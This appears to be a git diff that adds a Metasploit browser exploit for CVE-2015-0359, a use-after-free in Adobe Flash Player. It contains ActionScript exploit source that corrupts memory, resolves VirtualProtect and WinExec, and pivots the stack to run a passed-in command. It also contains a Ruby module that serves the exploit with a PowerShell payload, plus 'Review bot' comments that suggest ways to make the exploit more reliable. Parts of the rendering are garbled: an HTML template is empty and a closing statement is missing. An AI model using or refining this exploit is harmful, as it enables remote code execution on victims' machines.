zw~aIQat;dQ-lH}1r{*dq00i$JK0CAteAgodNdCAqZZ=zNWdK(({71Ci*?|zhdYnFk zzAc!m9#p=~XtJyy9%k->l*v2w3%)0C>$6axVl}?bf)p>Oe^&93H3&eL>XTq;hZFV> ziWojo*W6dC+G*|bVQliVzroBHdw2vhDZ)Q2Y!XW3&kmOg$^NtTz79PE?7}{V1u-sH zj=)nOWu0d-P@O9TM}azf!I64^N?9q1`Zq2Y7RiV5_>Fs-MEuq+uNLa5^Ffg{g9}j8 z89_ek`&u&#)Ee1$DL(^M0v~-0>rRrplW=Y~wbTY{JL4IHe(?BNu}4B^kZWcqVnSQO zDMp!Ny^LEIFC?nqxF^3z@FSChoBpzv_Pin=v~FvomBo|QvYdKyrGT^i zBOwOzO+p23xo9i9JApM#r+FOZvxn0FqMMwg!NkFCSKG!uNW^Hesdh`9DT>aAe(aUW zkq-{nHwT64OR21%JvgW$%7*s4HKePJ>jqNY>e!6o*tKB&)8xRiuxS*QgDXEZMTpMD zm?am+o@QRQ1OB27r@uVbMWBYe9*+aUD~J# zFo_|5HM*pGu7^2MH;AAcBR;6a$m~`1 z3Zd;q&-}6^yND6;4{ZS&)$5JJ{8||yT0usr`r1v9xL9BBtfm%H)KufFc$jP( z6q)m)2pt8G?~(;n+n(LOHP|C|azA>3VKrS@G1L5v=GQ!iaSE1%G%G~$AV~ZHm9wAE zTt>dR`#23Q+hO0Jj^O?y()&tQ4IB$`WKFl}#S#*4@NazH5ywD+IVB(f-~iJ|&Z^*Z clE;ovi+sQcg&$q=86_sHwNW(x{|x%W0H|{{(f|Me literal 0 HcmV?d00001 diff --git a/external/source/exploits/CVE-2015-0359/Msf.as b/external/source/exploits/CVE-2015-0359/Msf.as new file mode 100755 index 0000000000..1bf0cd1947 --- /dev/null +++ b/external/source/exploits/CVE-2015-0359/Msf.as 
@@ -0,0 +1,261 @@
+// Build how to:
+// 1. Download the AIRSDK, and use its compiler.
+// 2. Be support to support 16.0 as target-player (flex-config.xml).
+// 3. Download the Flex SDK (4.6)
+// 4. Copy the Flex SDK libs (/framework/libs) to the AIRSDK folder (/framework/libs)
+// (all of them, also, subfolders, specially mx, necessary for the Base64Decoder)
+// 5. Build with: mxmlc -o msf.swf Msf.as
+
+// Original code by @hdarwin89 modified to be used from msf
+// https://git.hacklab.kr/snippets/13
+// http://pastebin.com/Wj3NViUu
+
+package
+{
+ import flash.display.Sprite
+ import flash.events.Event
+ import flash.utils.ByteArray
+ import flash.system.Worker
+ import flash.system.WorkerDomain
+ import flash.system.MessageChannel
+ import flash.system.ApplicationDomain
+ import avm2.intrinsics.memory.casi32
+ import flash.display.LoaderInfo
+ import mx.utils.Base64Decoder
+
+ public class Msf extends Sprite
+ {
+ private var ov:Vector. = new Vector.(25600)
+ private var uv:Vector. = new Vector.
+ private var ba:ByteArray = new ByteArray()
+ private var stack:Vector. = new Vector.(0x6400)
+ private var payload_space:Vector. = new Vector.(0x6400)
+ private var b64:Base64Decoder = new Base64Decoder()
+ private var payload:String = ""
+ private var worker:Worker
+ private var mc:MessageChannel
+
+ public function Msf()
+ {
+ if (Worker.current.isPrimordial) mainThread()
+ else workerThread()
+ }
+
+ private function mainThread():void
+ {
+ b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
+ payload = b64.toByteArray().toString()
+ ba.length = 0x1000
+ ba.shareable = true
+ for (var i:uint = 0; i < ov.length; i++) {
+ ov[i] = new Vector.(1014)
+ ov[i][0] = ba
+ ov[i][1] = this
+ ov[i][2] = stack
+ ov[i][3] = payload_space
+ }
+ for (i = 0; i < ov.length; i += 2) delete(ov[i])
+ worker = WorkerDomain.current.createWorker(this.loaderInfo.bytes)
+ mc = worker.createMessageChannel(Worker.current)
+ mc.addEventListener(Event.CHANNEL_MESSAGE, onMessage)
+ worker.setSharedProperty("mc", mc)
+ worker.setSharedProperty("ba", ba)
+ ApplicationDomain.currentDomain.domainMemory = ba
+ worker.start()
+ }
+
+ private function workerThread():void
+ {
+ var ba:ByteArray = Worker.current.getSharedProperty("ba")
+ var mc:MessageChannel = Worker.current.getSharedProperty("mc")
+ var tmp:ByteArray = new ByteArray()
+ tmp.length = 0x2000
+
+ for (var i:uint = 0; i < 20; i++) {
+ new Vector.(1022)
+ }
+
+ ba.writeBytes(tmp)
+ ov[0] = new Vector.(1022)
+
+ mc.send("")
+ while (mc.messageAvailable);
+
+ // Vector length corruption didn't work, aborting...
+ if (ov[0].length != 0xffffffff) {
+ return
+ }
+
+ // Bad memory layout :( restoring length, and aborting...
+ if (ov[0][0x407] != 0x3f6) {
+ ov[0][0x3ffffffe] = 1022
+ return
+ }
+
+ ov[0][0] = ov[0][0x403] - 0x18 - 0x1000
+ var buffer:uint = vector_read(vector_read(ov[0][0x408] - 1 + 0x40) + 8) //+ 0x100000
+ var main:uint = ov[0][0x409] - 1
+ var stack_object:uint = ov[0][0x40a] - 1
+ var payload_space_object:uint = ov[0][0x40b] - 1
+ var vtable:uint = vector_read(main)
+ var stack_address:uint = vector_read(stack_object + 0x18) as uint
+ var payload_address:uint = vector_read(payload_space_object + 0x18) as uint
+ vector_write(vector_read(ov[0][0x408] - 1 + 0x40) + 8)
+ vector_write(vector_read(ov[0][0x408] - 1 + 0x40) + 16, 0xffffffff)
+ mc.send(buffer.toString() + "/" + main.toString() + "/" + vtable.toString() + "/" + stack_address.toString() + "/" + payload_address.toString())
+ }
+
+ private function onMessage(e:Event):void
+ {
+ casi32(0, 1022, 0xFFFFFFFF)
+ if (ba.length != 0xffffffff) mc.receive()
+ else {
+ // Restoring vector length
+ var res:uint = casi32(0, 0xffffffff, 1022)
+ if (res != 0xffffffff) { // Something has been wrong... aborting
+ return
+ }
+ ba.endian = "littleEndian"
+ var data:Array = (mc.receive() as String).split("/")
+ var buffer:uint = parseInt(data[0]) as uint
+ var main:uint = parseInt(data[1]) as uint
+ var vtable:uint = parseInt(data[2]) as uint
+ var stack_address:uint = parseInt(data[3]) as uint
+ var payload_address:uint = parseInt(data[4]) as uint
+ var flash:uint = base(vtable)
+ var winmm:uint = module("winmm.dll", flash)
+ var kernel32:uint = module("kernel32.dll", winmm)
+ var virtualprotect:uint = procedure("VirtualProtect", kernel32)
+ var winexec:uint = procedure("WinExec", kernel32)
+ var xchgeaxespret:uint = gadget("c394", 0x0000ffff, flash)
+ var xchgeaxesiret:uint = gadget("c396", 0x0000ffff, flash)
+
+ // Continuation of execution
+ byte_write(buffer + 0x10, "\xb8", false); byte_write(0, vtable, false) // mov eax, vtable
+ byte_write(0, "\xbb", false); byte_write(0, main, false) // mov ebx, main
+ byte_write(0, "\x89\x03", false) // mov [ebx], eax
+ byte_write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
+
+ // Put the payload (command) in memory
+ byte_write(payload_address + 8, payload, true); // payload
+
+ // Put the fake vtabe / stack on memory
+ byte_write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
+ byte_write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call dword ptr [eax+0A4h]
+ byte_write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
+ byte_write(0, virtualprotect)
+
+ // VirtualProtect
+ byte_write(0, winexec)
+ byte_write(0, buffer + 0x10)
+ byte_write(0, 0x1000)
+ byte_write(0, 0x40)
+ byte_write(0, buffer + 0x8) // Writable address (4 bytes)
+
+ // WinExec
+ byte_write(0, buffer + 0x10)
+ byte_write(0, payload_address + 8)
+ byte_write(0)
+
+ byte_write(main, stack_address + 0x18000) // overwrite with fake vtable
+
+ toString() // call method in the fake vtable
+ }
+ }
+
+ private function vector_write(addr:uint, value:uint = 0):void
+ {
+ var pos:uint = 0
+
+ if (addr > ov[0][0]) {
+ pos = ((addr - ov[0][0]) / 4) - 2
+ } else {
+ pos = ((0xffffffff - (ov[0][0] - addr)) / 4) - 1
+ }
+
+ ov[0][pos] = value
+ }
+
+ private function vector_read(addr:uint):uint
+ {
+ var pos:uint = 0
+
+ if (addr > ov[0][0]) {
+ pos = ((addr - ov[0][0]) / 4) - 2
+ } else {
+ pos = ((0xffffffff - (ov[0][0] - addr)) / 4) - 1
+ }
+
+ return ov[0][pos]
+ }
+
+ private function byte_write(addr:uint, value:* = 0, zero:Boolean = true):void
+ {
+ if (addr) ba.position = addr
+ if (value is String) {
+ for (var i:uint; i < value.length; i++) ba.writeByte(value.charCodeAt(i))
+ if (zero) ba.writeByte(0)
+ } else ba.writeUnsignedInt(value)
+ }
+
+ private function byte_read(addr:uint, type:String = "dword"):uint
+ {
+ ba.position = addr
+ switch(type) {
+ case "dword":
+ return ba.readUnsignedInt()
+ case "word":
+ return ba.readUnsignedShort()
+ case "byte":
+ return ba.readUnsignedByte()
+ }
+ return 0
+ }
+
+ private function base(addr:uint):uint
+ {
+ addr &= 0xffff0000
+ while (true) {
+ if (byte_read(addr) == 0x00905a4d) return addr
+ addr -= 0x10000
+ }
+ return 0
+ }
+
+ private function module(name:String, addr:uint):uint
+ {
+ var iat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x80), i:int = -1
+ while (true) {
+ var entry:uint = byte_read(iat + (++i) * 0x14 + 12)
+ if (!entry) throw new Error("FAIL!");
+ ba.position = addr + entry
+ if (ba.readUTFBytes(name.length).toUpperCase() == name.toUpperCase()) break
+ }
+ return base(byte_read(addr + byte_read(iat + i * 0x14 + 16)))
+ }
+
+ private function procedure(name:String, addr:uint):uint
+ {
+ var eat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x78)
+ var numberOfNames:uint = byte_read(eat + 0x18)
+ var addressOfFunctions:uint = addr + byte_read(eat + 0x1c)
+ var addressOfNames:uint = addr + byte_read(eat + 0x20)
+ var addressOfNameOrdinals:uint = addr + byte_read(eat + 0x24)
+ for (var i:uint = 0; ; i++) {
+ var entry:uint = byte_read(addressOfNames + i * 4)
+ ba.position = addr + entry
+ if (ba.readUTFBytes(name.length+2).toUpperCase() == name.toUpperCase()) break
+ }
+ return addr + byte_read(addressOfFunctions + byte_read(addressOfNameOrdinals + i * 2, "word") * 4)
+ }
+
+ private function gadget(gadget:String, hint:uint, addr:uint):uint
+ {
+ var find:uint = 0
+ var limit:uint = byte_read(addr + byte_read(addr + 0x3c) + 0x50)
+ var value:uint = parseInt(gadget, 16)
+ for (var i:uint = 0; i < limit - 4; i++) if (value == (byte_read(addr + i) & hint)) break
+ return addr + i
+ }
+ }
+}
diff --git a/modules/exploits/windows/browser/adobe_flash_domain_memory_uaf.rb b/modules/exploits/windows/browser/adobe_flash_domain_memory_uaf.rb
new file mode 100644
index 0000000000..76b798a401
--- /dev/null
+++ b/modules/exploits/windows/browser/adobe_flash_domain_memory_uaf.rb
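Review bot: `gadget()` at the end of the hunk returns `addr + i` even when the byte pattern is never found, so a miss silently yields `addr + limit - 4` — a non-gadget address that `onMessage` then writes into the fake vtable at `stack_address + 0x18000` / `+ 0x18070` / `+ 0x180a4` — whereas `module()` handles the same kind of miss with `throw new Error("FAIL!")`; adding `if (i >= limit - 4) throw new Error("FAIL!")` before the `return` keeps the two consistent and aborts before the vtable overwrite instead of jumping to an arbitrary address. `base()` has a similar shape: `while (true)` walks down in 0x10000 steps with no lower bound (the trailing `return 0` is unreachable), so a bad `vtable` value received from the worker turns into an open-ended scan through the re-pointed, full-address-space ByteArray, which presumably faults on the first unmapped page; bounding it with a counter such as `for (var n:uint = 0; n < 0x1000; n++)` and falling through to an explicit abort would make that a clean failure. The scan in `gadget()` also covers the whole image (`limit` is read from the PE header at `+0x50`) without checking that the hit lies in an executable section, which is worth a one-line comment, and the `find` local there is unused. Finally, the build note `// 2. Be support to support 16.0 as target-player (flex-config.xml).` reads as a typo for `// 2. Be sure to set 16.0 as target-player (flex-config.xml).`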
@@ -0,0 +1,112 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::Powershell
+ include Msf::Exploit::Remote::BrowserExploitServer
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => 'Adobe Flash Player domainMemory ByteArray Use After Free',
+ 'Description' => %q{
+ This module exploits a use-after-free vulnerability in Adobe Flash Player. The
+ vulnerability occurs when the ByteArray assigned to the current ApplicationDomain
+ is freed from an ActionScript worker, when forcing a reallocation by copying more
+ contents than the original capacity, but Flash forgets to update the domainMemory
+ pointer, leading to a use-after-free situation when the main worker references the
+ domainMemory again. This module has been tested successfully on Windows 7 SP1
+ (32-bit), IE 8 and IE11 with Flash 17.0.0.134.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'bilou', # Vulnerability discovery according to Flash Advisory
+ 'Unknown', # Exploit in the wild
+ 'hdarwin', # @hdarwin89 / public exploit (msf module is based on this one)
+ 'juan vazquez' # msf module
+ ],
+ 'References' =>
+ [
+ ['CVE', '2015-0359'],
+ ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-06.html'],
+ ['URL', 'https://www.fireeye.com/blog/threat-research/2015/04/angler_ek_exploiting.html'],
+ ['URL', 'http://malware.dontneedcoffee.com/2015/04/cve-2015-0359-flash-up-to-1700134-and.html'],
+ ['URL', 'https://git.hacklab.kr/snippets/13'],
+ ['URL', 'http://pastebin.com/Wj3NViUu']
+ ],
+ 'Payload' =>
+ {
+ 'DisableNops' => true
+ },
+ 'Platform' => 'win',
+ 'BrowserRequirements' =>
+ {
+ :source => /script|headers/i,
+ :os_name => OperatingSystems::Match::WINDOWS_7,
+ :ua_name => Msf::HttpClients::IE,
+ :flash => lambda { |ver| ver =~ /^17\./ && Gem::Version.new(ver) <= Gem::Version.new('17.0.0.134') },
+ :arch => ARCH_X86
+ },
+ 'Targets' =>
+ [
+ [ 'Automatic', {} ]
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => 'Apr 14 2014',
+ 'DefaultTarget' => 0))
+ end
+
+ def exploit
+ @swf = create_swf
+ super
+ end
+
+ def on_request_exploit(cli, request, target_info)
+ print_status("Request: #{request.uri}")
+
+ if request.uri =~ /\.swf$/
+ print_status('Sending SWF...')
+ send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
+ return
+ end
+
+ print_status('Sending HTML...')
+ send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
+ end
+
+ def exploit_template(cli, target_info)
+ swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
+ target_payload = get_payload(cli, target_info)
+ psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
+ b64_payload = Rex::Text.encode_base64(psh_payload)
+
+ html_template = %Q|
+
+
+
+
+
+
+
+
+
+
+ |
+
+ return html_template, binding()
+
+ def create_swf
+ path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0359', 'msf.swf')
+ swf = ::File.open(path, 'rb') { |f| swf = f.read }
+
+ swf
+ end
+
+end
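Review bot: `'DisclosureDate' => 'Apr 14 2014'` is a year off — the CVE is 2015-0359, the advisory reference is APSB15-06 and both blog references are dated 2015/04 — so it should read `'DisclosureDate' => 'Apr 14 2015'`. In `create_swf`, `swf = ::File.open(path, 'rb') { |f| swf = f.read }` assigns `swf` both inside the block and from its return value; `swf = ::File.binread(path)` does the same in one expression and drops the dangling second assignment. The `:flash` lambda admits only the 17.x branch up to 17.0.0.134, which matches the single build named in the description, and since the SWF in this commit depends on fixed heap-layout constants (`0x407`, `0x3f6`, `0x403`, …) that gate should not be widened to other affected branches without re-testing, which deserves a comment next to it: `# offsets in msf.swf were only verified against 17.0.0.134 on Win7/IE`. The `end` closing `exploit_template` before `def create_swf` is not visible in this rendering of the hunk, presumably an extraction artifact rather than a defect in the commit.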